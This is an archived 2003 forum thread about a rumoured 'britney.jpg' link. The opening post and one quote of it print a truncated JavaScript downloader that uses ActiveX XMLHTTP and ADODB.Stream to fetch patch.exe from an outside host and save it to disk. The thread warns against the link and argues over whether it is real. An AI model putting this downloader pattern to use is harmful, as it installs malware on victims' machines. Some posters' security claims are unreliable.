View Full Version : Virus #########
bumpydog
10-27-2003, 12:18 AM
I have just been informed from another member about this Virus. So I have copied his post and I am putting this here for you.
Ok people. There is a new virus out there. Its javascript and is in a URL everyone is passing around. I am going to put that URL in this post so everyone knows the URL and knows not to follow it.
If you click on the link or load it up in IE, while in windows XP you will have to reinstall your system from scratch. You will be screwed.
This is the link. I have broken it up so you cannot click on it by mistake.
Ht#p ://w#w. anglefire.com/cleb2 /picsx/britney.jpg
DO NOT CLICK ON THIS LINK, IT WILL DESTROY YOUR XP INSTALL
A lot of people are pasting this link around. DO NOT GO TO IT.
The Javascript code it executes:
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files
Regards
Bumpydog
I went and nothing happened but my XP doesn't hava Java either.
muchspl2
10-27-2003, 12:31 AM
I have java and went their, few pop ups, but no malices code that I saw, hmm a member causing a scare for no reason, I'm shocked, down right shocked
http://members.cox.net/dodger1954/pics/BoyWhoCriedWolf.jpg
Wizzandabe
10-27-2003, 12:36 AM
LOL, That link was going on IRC today, saying dont go on it.
BTW, This needs to be moved. ;)
bumpydog
10-27-2003, 12:39 AM
An admin has posted it elesewhere. so because they are an admin I thought that it was important enough to inform others of this.
If its wrong then its wrong.
If its not then its your look out.
Wizzandabe
10-27-2003, 12:40 AM
Ah well, we will see. :P
muchspl2
10-27-2003, 12:41 AM
Originally posted by bumpydog@27 October 2003 - 01:39
An admin has posted it elesewhere.
who ??
Wizzandabe
10-27-2003, 12:46 AM
Yeah, I just looked as well. <_<
EnJoi
10-27-2003, 12:48 AM
so what happens at this link?
I took the risk of going because I wanted to see if my AV would work and how it looks now.
wormless
10-27-2003, 12:57 AM
Originally posted by Gre1@27 October 2003 - 00:54
I took the risk of going because I wanted to see if my AV would work and how it looks now.
have u restarted the virus might work then lol jk
I can' t read your reply right. Did I restart what? My comp yup but it wasn't because of that. I know u are joking about whatever u are trying to say :lol: :lol: :P
EnJoi
10-27-2003, 01:02 AM
Originally posted by Gre1@27 October 2003 - 01:59
I can' t read your reply right. Did I restart what? My comp yup but it wasn't because of that. I know u are joking about whatever u are trying to say :lol: :lol: :P
so nothin happened
twisterX
10-27-2003, 01:16 AM
Originally posted by bumpydog@27 October 2003 - 00:18
I have just been informed from another member about this Virus. So I have copied his post and I am putting this here for you.
Ok people. There is a new virus out there. Its javascript and is in a URL everyone is passing around. I am going to put that URL in this post so everyone knows the URL and knows not to follow it.
If you click on the link or load it up in IE, while in windows XP you will have to reinstall your system from scratch. You will be screwed.
This is the link. I have broken it up so you cannot click on it by mistake.
Ht#p ://w#w. anglefire.com/cleb2 /picsx/britney.jpg
DO NOT CLICK ON THIS LINK, IT WILL DESTROY YOUR XP INSTALL
A lot of people are pasting this link around. DO NOT GO TO IT.
The Javascript code it executes:
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files
Regards
Bumpydog
thank u for that
TheFilePirater
10-27-2003, 01:32 AM
its not real twister..........
DasScoot
10-27-2003, 01:35 AM
Eh...I was sent that link this morning, and incidentally my XP DID break this morning...something about some corrupted file, XP won't even start now.
If this IS a virus, the dude who sent me that link is gonna die the next time I see him...
Edit: the link the code sends you to is 'suspended'. That would mean going to the site now would no longer infect you, but would imply that it was a virus at some point.
EnJoi
10-27-2003, 02:30 AM
Originally posted by DasScoot@27 October 2003 - 02:35
Edit: the link the code sends you to is 'suspended'. That would mean going to the site now would no longer infect you, but would imply that it was a virus at some point.
w00t?
DasScoot
10-27-2003, 02:35 AM
Somebody probably complained the the company hosting the virus, who then took the site down.
Not only do you guys seem to think this can do damage but
You guys looked for this.....................Jeez?
muchspl2
10-27-2003, 04:00 AM
I right wrongs and disperse myths, call me crazy, but I went in knowing the possible outcome
i've not even looked, it's a britney photo riight? how's that a virus?
It is after all just a jpg!
DasScoot
10-27-2003, 04:17 AM
If it's the same link I went to earlier, it's not just a jpg. It's not even of Britney ;-/
wormless
10-27-2003, 04:21 AM
Originally posted by Gre1@27 October 2003 - 00:59
I can' t read your reply right. Did I restart what? My comp yup but it wasn't because of that. I know u are joking about whatever u are trying to say :lol: :lol: :P
soz gre was in a rush earlier but now i got all the time in the world. yea i ment have u restarted yr pc,hope u didnt have a viro though
wormless
10-27-2003, 04:25 AM
Originally posted by jfm@27 October 2003 - 04:09
i've not even looked, it's a britney photo riight? how's that a virus?
It is after all just a jpg!
britney y would u click on it anyway if it is a viro then the ppl who clicked on it will find out sooner or later and it may activate on a certain day or time and u done it at yr own risk.
edit: just searched "britney" on nortons site and the is 2 viruses with her name. madonna is with one of those 2. that one isnt related to them unless u got more details
Originally posted by wormless+27 October 2003 - 04:25--></div><table border='0' align='center' width='95%' cellpadding='3' cellspacing='1'><tr><td>QUOTE (wormless @ 27 October 2003 - 04:25)</td></tr><tr><td id='QUOTE'> <!--QuoteBegin-jfm@27 October 2003 - 04:09
i've not even looked, it's a britney photo riight? how's that a virus?
It is after all just a jpg!
britney y would u click on it anyway if it is a viro then the ppl who clicked on it will find out sooner or later and it may activate on a certain day or time and u done it at yr own risk.
edit: just searched "britney" on nortons site and the is 2 viruses with her name. madonna is with one of those 2. that one isnt related to them unless u got more details [/b][/quote]
I just went there, Not found.
But just looking at something called *.jpg will not affect your computer (unless you dl it, and if it does then affect you it is not a *.jpg) Don't be afraid to go to links. They're not a problem.
Rip The Jacker
10-27-2003, 06:07 AM
Originally posted by Gre1@26 October 2003 - 16:26
I went and nothing happened but my XP doesn't hava Java either.
LMAO... hava java?
But jfm is right, that links to a .JPG file. You can't run a javascript in a .JPG file. JPG's are harmless images.
Yeah I did that on purpose. :D :lol:
nikita69
10-27-2003, 06:59 AM
wow, i missed all the fun, i had to take my beauty sleep. this is just another reason why people should get a program such NIS or alike to BLOCK ALL Java and ACTIVE/x until the user selects to do so. Additionally for more security, from a trace/track/hack point of view, disable both all together. On one important machine I have, I have it disabled.
Originally posted by nikita69@27 October 2003 - 06:59
wow, i missed all the fun, i had to take my beauty sleep. this is just another reason why people should get a program such NIS or alike to BLOCK ALL Java and ACTIVE/x until the user selects to do so. Additionally for more security, from a trace/track/hack point of view, disable both all together. On one important machine I have, I have it disabled.
HuH?
DasScoot
10-27-2003, 07:11 AM
Sorry boys, but you're wrong. You CAN get a virus by going to a website with a .jpg extension.
See? (http://lists.netsys.com/pipermail/full-disclosure/2003-September/009917.html)
The code isn't in the jpeg, it's in the website.
wormless
10-27-2003, 07:13 AM
Originally posted by jfm+27 October 2003 - 07:03--></div><table border='0' align='center' width='95%' cellpadding='3' cellspacing='1'><tr><td>QUOTE (jfm @ 27 October 2003 - 07:03)</td></tr><tr><td id='QUOTE'> <!--QuoteBegin-nikita69@27 October 2003 - 06:59
wow, i missed all the fun, i had to take my beauty sleep. this is just another reason why people should get a program such NIS or alike to BLOCK ALL Java and ACTIVE/x until the user selects to do so. Additionally for more security, from a trace/track/hack point of view, disable both all together. On one important machine I have, I have it disabled.
HuH? [/b][/quote]
prob goto her sig tools
wormless
10-27-2003, 07:14 AM
Originally posted by DasScoot@27 October 2003 - 07:11
Sorry boys, but you're wrong. You CAN get a virus by going to a website with a .jpg extension.
See? (http://lists.netsys.com/pipermail/full-disclosure/2003-September/009917.html)
The code isn't in the jpeg, it's in the website.
is that link safe
Originally posted by DasScoot@27 October 2003 - 07:11
Sorry boys, but you're wrong. You CAN get a virus by going to a website with a .jpg extension.
See? (http://lists.netsys.com/pipermail/full-disclosure/2003-September/009917.html)
The code isn't in the jpeg, it's in the website.
Jeez, did you actually read that article?
Understand it?
Thought not!
That's java too. Won't load on my comp.
wormless
10-27-2003, 07:22 AM
Originally posted by jfm@27 October 2003 - 07:19
[QUOTE=DasScoot,27 October 2003 - 07:11] Sorry boys, but you're wrong. You CAN get a virus by going to a website with a .jpg extension.
oh that one seen that in another post
Originally posted by jfm+27 October 2003 - 07:19--></div><table border='0' align='center' width='95%' cellpadding='3' cellspacing='1'><tr><td>QUOTE (jfm @ 27 October 2003 - 07:19)</td></tr><tr><td id='QUOTE'> <!--QuoteBegin-DasScoot@27 October 2003 - 07:11
Sorry boys, but you're wrong. You CAN get a virus by going to a website with a .jpg extension.
See? (http://lists.netsys.com/pipermail/full-disclosure/2003-September/009917.html)
The code isn't in the jpeg, it's in the website.
Jeez, did you actually read that article?
Understand it?
Thought not! [/b][/quote]
There is a huge dfference brtween viewing and loading. you may not be able to view a website for 101 reasons, eg: microsoft does not support java any more, (it doesn't) but only loading to your machine can cause you trouble, visiting a website is analagous to looking through a
window
Rip The Jacker
10-27-2003, 08:03 AM
Opera is the way to go lol.
bumpydog
10-27-2003, 09:20 AM
I first saw this Virus message/ threat upon another forum. I do get about and have contact elesewhere.
NOTE
I looked at the message posted as it was put by Their by an Admin, then I thought that it must be valid.
So I believed that since Kazaa first got me into this file sharing thing (which I love to bits), then if I can help in anyother way then I will take my own time out to do that.
I have also posted it eleswhere as if it helps save someone losing their files etc,etc . then I believe thats a good thing.
Regards
Bumpydog
Auburn_Tygaz
10-27-2003, 09:34 AM
Originally posted by jfm@27 October 2003 - 03:49
Not only do you guys seem to think this can do damage but
You guys looked for this.....................Jeez?
Hey I simply looked at it b/c I'm on a networked computer at work. Well my job kinda sux and I visited the link to see what's up....so that kinda let's you know what my intentions were :devil:
bumpydog
10-27-2003, 09:35 AM
LOL.
Woof
Bumpydog
{I}{K}{E}
10-27-2003, 01:22 PM
Britney Kills your computer
Another internet worm was released through IRC networks. The worm is disguised as a .jpg picture named Britney.jpg from Angelfire. Whatever you do do not open britney links in Internet explorer.
An exploit taking advantage of holes in Internet Explorer along with Windows Media Player ensures the worm free passage to your computer, where it starts deleting system files and destroying the registry.
The effect of this is: no shortcuts work, no programs, except those already running will work. If mirc is running it will proceed by installing a script that announces the url to britney.jpg in all the channels you have joined. Some have mentioned that it even uploads sites.dat from your FlashFXP directory.
This is a worm your anti-virus didn't popup because it's a new one!!
*´¯`·.¸¸.»Çô©ö»
10-27-2003, 01:56 PM
Originally posted by {I}{K}{E}@27 October 2003 - 13:22
Britney Kills your computer
Another internet worm was released through IRC networks. The worm is disguised as a .jpg picture named Britney.jpg from Angelfire. Whatever you do do not open britney links in Internet explorer.
An exploit taking advantage of holes in Internet Explorer along with Windows Media Player ensures the worm free passage to your computer, where it starts deleting system files and destroying the registry.
The effect of this is: no shortcuts work, no programs, except those already running will work. If mirc is running it will proceed by installing a script that announces the url to britney.jpg in all the channels you have joined. Some have mentioned that it even uploads sites.dat from your FlashFXP directory.
This is a worm your anti-virus didn't popup because it's a new one!!
:angry: Bitch, Bstd's ! :angry:
DasScoot
10-27-2003, 02:31 PM
Originally posted by {I}{K}{E}@27 October 2003 - 13:22
Britney Kills your computer
Another internet worm was released through IRC networks. The worm is disguised as a .jpg picture named Britney.jpg from Angelfire. Whatever you do do not open britney links in Internet explorer.
An exploit taking advantage of holes in Internet Explorer along with Windows Media Player ensures the worm free passage to your computer, where it starts deleting system files and destroying the registry.
The effect of this is: no shortcuts work, no programs, except those already running will work. If mirc is running it will proceed by installing a script that announces the url to britney.jpg in all the channels you have joined. Some have mentioned that it even uploads sites.dat from your FlashFXP directory.
This is a worm your anti-virus didn't popup because it's a new one!!
Yes, that's exactly what happened to me.
Wizzandabe
10-27-2003, 02:53 PM
Can a MOD removed the LInk HERE (http://www.klboard.ath.cx/index.php?showtopic=77195&st=0)
darkewolf
10-30-2003, 03:55 AM
Originally posted by jfm+27 October 2003 - 07:29--></div><table border='0' align='center' width='95%' cellpadding='3' cellspacing='1'><tr><td>QUOTE (jfm @ 27 October 2003 - 07:29)</td></tr><tr><td id='QUOTE'>
Originally posted by jfm@27 October 2003 - 07:19
<!--QuoteBegin-DasScoot@27 October 2003 - 07:11
Sorry boys, but you're wrong. You CAN get a virus by going to a website with a .jpg extension.
See? (http://lists.netsys.com/pipermail/full-disclosure/2003-September/009917.html)
The code isn't in the jpeg, it's in the website.
Jeez, did you actually read that article?
Understand it?
Thought not!
There is a huge dfference brtween viewing and loading. you may not be able to view a website for 101 reasons, eg: microsoft does not support java any more, (it doesn't) but only loading to your machine can cause you trouble, visiting a website is analagous to looking through a
window [/b][/quote]
JFM- I hate to tell ya this, but you're misinformed. simply opening a page, with the right (err...wrong kind of) scripts in it, CAN do harm, if the scripts are allowed to load. That's how so many of the IE "hijacker" malwares are installed, is by scripts imbedded inside the page. Hijackers go in, re-write registry entries, to whatever, and the user has no knowledge of what has happened (if they arent running appropriate protection) until the next time that they open up their browser, and their homepage has changed itself, starts acting funny, has recurring pop-ups from one particular site...or whatever.
I'm only using that as my example for this....there's a LOT more that scripts can do. For another example, that first run of the ILOVEYOU virus was installed by scripts within a site, as a self-executable file. No clicking, no do you wish to install this, nada, just go to the site and BOOM, ya got it. Oh and guess what? It's even more fun.....they can imbed these things into HTML emails too.
You are partially correct tho. The .jpg file in itself is harmless. But it's what's in the rest of the page that is harmful. But, on not loading the file onto your system? Sorry, gotta correct you on that one too. There's all kinds of copies of it in your temp internet folder, cache files, and folders that are hidden down inside the temp internet folder that cleaning it out, does NOT get rid of. A lot of scripts hide in those folders. hide out in the temp folder inside of windows directory also. It's not like looking through a window, your browser Loads the page, whenever it shows up on your screen....and there fore loads the scripts if you dont take countermeasures. Sometimes, even when you do take countermeasures.
What I hate are the reactive scripts. the ones that just sit there, and wait until you hit a different site, with code in it that it's programmed to react to. My example is (never could track the bastard down, had to format to get rid of it) one that anytime I went to yahoo, google, or any of the other big search engines, and/or used a search box- it would cause a porno pop-under (that I never could block with a pop-up stopper) and cause the original window to auto-refresh CONSTANTLY...making any other browser windows that were open not be able to be seen, because the original was going berserk. The script from that one is from coolwebsearch.com (which uses a very small pop-under window to install the script.) but be damned if I can tag where it sleeps on the infected system. Spybot and ad-aware couldnt find it, even tho coolwebsearch is one of the things that spybot looks for.
Originally posted by darkewolf+30 October 2003 - 03:55--></div><table border='0' align='center' width='95%' cellpadding='3' cellspacing='1'><tr><td>QUOTE (darkewolf @ 30 October 2003 - 03:55)</td></tr><tr><td id='QUOTE'>
Originally posted by jfm@27 October 2003 - 07:29
Originally posted by jfm@27 October 2003 - 07:19
<!--QuoteBegin-DasScoot@27 October 2003 - 07:11
Sorry boys, but you're wrong. You CAN get a virus by going to a website with a .jpg extension.
See? (http://lists.netsys.com/pipermail/full-disclosure/2003-September/009917.html)
The code isn't in the jpeg, it's in the website.
Jeez, did you actually read that article?
Understand it?
Thought not!
There is a huge dfference brtween viewing and loading. you may not be able to view a website for 101 reasons, eg: microsoft does not support java any more, (it doesn't) but only loading to your machine can cause you trouble, visiting a website is analagous to looking through a
window
JFM- I hate to tell ya this, but you're misinformed. simply opening a page, with the right (err...wrong kind of) scripts in it, CAN do harm, if the scripts are allowed to load. That's how so many of the IE "hijacker" malwares are installed, is by scripts imbedded inside the page. Hijackers go in, re-write registry entries, to whatever, and the user has no knowledge of what has happened (if they arent running appropriate protection) until the next time that they open up their browser, and their homepage has changed itself, starts acting funny, has recurring pop-ups from one particular site...or whatever.
I'm only using that as my example for this....there's a LOT more that scripts can do. For another example, that first run of the ILOVEYOU virus was installed by scripts within a site, as a self-executable file. No clicking, no do you wish to install this, nada, just go to the site and BOOM, ya got it. Oh and guess what? It's even more fun.....they can imbed these things into HTML emails too.
You are partially correct tho. The .jpg file in itself is harmless. But it's what's in the rest of the page that is harmful. But, on not loading the file onto your system? Sorry, gotta correct you on that one too. There's all kinds of copies of it in your temp internet folder, cache files, and folders that are hidden down inside the temp internet folder that cleaning it out, does NOT get rid of. A lot of scripts hide in those folders. hide out in the temp folder inside of windows directory also. It's not like looking through a window, your browser Loads the page, whenever it shows up on your screen....and there fore loads the scripts if you dont take countermeasures. Sometimes, even when you do take countermeasures.
What I hate are the reactive scripts. the ones that just sit there, and wait until you hit a different site, with code in it that it's programmed to react to. My example is (never could track the bastard down, had to format to get rid of it) one that anytime I went to yahoo, google, or any of the other big search engines, and/or used a search box- it would cause a porno pop-under (that I never could block with a pop-up stopper) and cause the original window to auto-refresh CONSTANTLY...making any other browser windows that were open not be able to be seen, because the original was going berserk. The script from that one is from coolwebsearch.com (which uses a very small pop-under window to install the script.) but be damned if I can tag where it sleeps on the infected system. Spybot and ad-aware couldnt find it, even tho coolwebsearch is one of the things that spybot looks for. [/b][/quote]
Yeah scripts! But not something that really is a *.jpg
InverseKinetix
10-30-2003, 12:38 PM
Shit I just clicked on that jpg link, at now my box aint right. I clicked and it did a clean install of XpPro with all updates, everythings working faster and it left $50 under my mouse.
Wicked
Whatever, about the 50 dollars part.
darkewolf
10-30-2003, 11:27 PM
Yeah scripts! But not something that really is a *.jpg
I agree with you there, that jpg files themselves are harmless. Well....actually, there ARE progs that let you imbed other files inside of like jpg, bmp, wav, and a few other formats, but those are encryption algorythms, and you have to have a copy of the program on your system, as well as the password to the file itself. Not that this is relevant...just sharing info.
my main point was that yeah, ya do load up the page that the jpg sits on, and in so doing, run the risk of loading up the scripts inbedded in the page.
found 50 bucks under the mouse? Send that mouse fairy my way dernit!
bumpydog
10-31-2003, 12:53 AM
I would just like to say that it feels rather good that I have helped out and that
so many have read and posted on my thread.
Regards
Bumpydog.
I bet it does, that's how the kl board makes u feel.
fkdup74
10-31-2003, 01:29 AM
Originally posted by InverseKinetix@30 October 2003 - 04:38
everythings working faster and it left $50 under my mouse
are you saying it f****d you like a prostitute? :lol:
seriously though, i have read something about some britney related virus that was supposed to be pretty nasty on your system, cant remember if it had to do with angelfire though, think i read it in symantecs site, gonna go check....
EnJoi
10-31-2003, 04:59 AM
i think a new ones spreading it said do u wanna see naked girls geocities.com/J0o17
?
wormless
10-31-2003, 05:09 AM
Originally posted by FKDUP74+31 October 2003 - 01:29--></div><table border='0' align='center' width='95%' cellpadding='3' cellspacing='1'><tr><td>QUOTE (FKDUP74 @ 31 October 2003 - 01:29)</td></tr><tr><td id='QUOTE'> <!--QuoteBegin-InverseKinetix@30 October 2003 - 04:38
everythings working faster and it left $50 under my mouse
are you saying it f****d you like a prostitute? :lol:
seriously though, i have read something about some britney related virus that was supposed to be pretty nasty on your system, cant remember if it had to do with angelfire though, think i read it in symantecs site, gonna go check.... [/b][/quote]
do a search 4 britney it will show 2 worms
i have posted them somewhere in this post!
DasScoot
10-31-2003, 02:14 PM
Yea, those were spread by email tho iirc.
Mosfos
11-01-2003, 01:08 AM
Guys, this is real! Angelfire just removed it from their site today.
Originally posted by darkewolf@30 October 2003 - 23:27
Yeah scripts! But not something that really is a *.jpg
I agree with you there, that jpg files themselves are harmless. Well....actually, there ARE progs that let you imbed other files inside of like jpg, bmp, wav, and a few other formats, but those are encryption algorythms, and you have to have a copy of the program on your system, as well as the password to the file itself. Not that this is relevant...just sharing info.
my main point was that yeah, ya do load up the page that the jpg sits on, and in so doing, run the risk of loading up the scripts inbedded in the page.
found 50 bucks under the mouse? Send that mouse fairy my way dernit!
I was going to add a reply, but this is getting to the point where it belongs in another area.
bumpydog
11-03-2003, 11:21 PM
LOL
Regards
Bumpydog
Powered by vBulletin® Version 4.2.3 Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.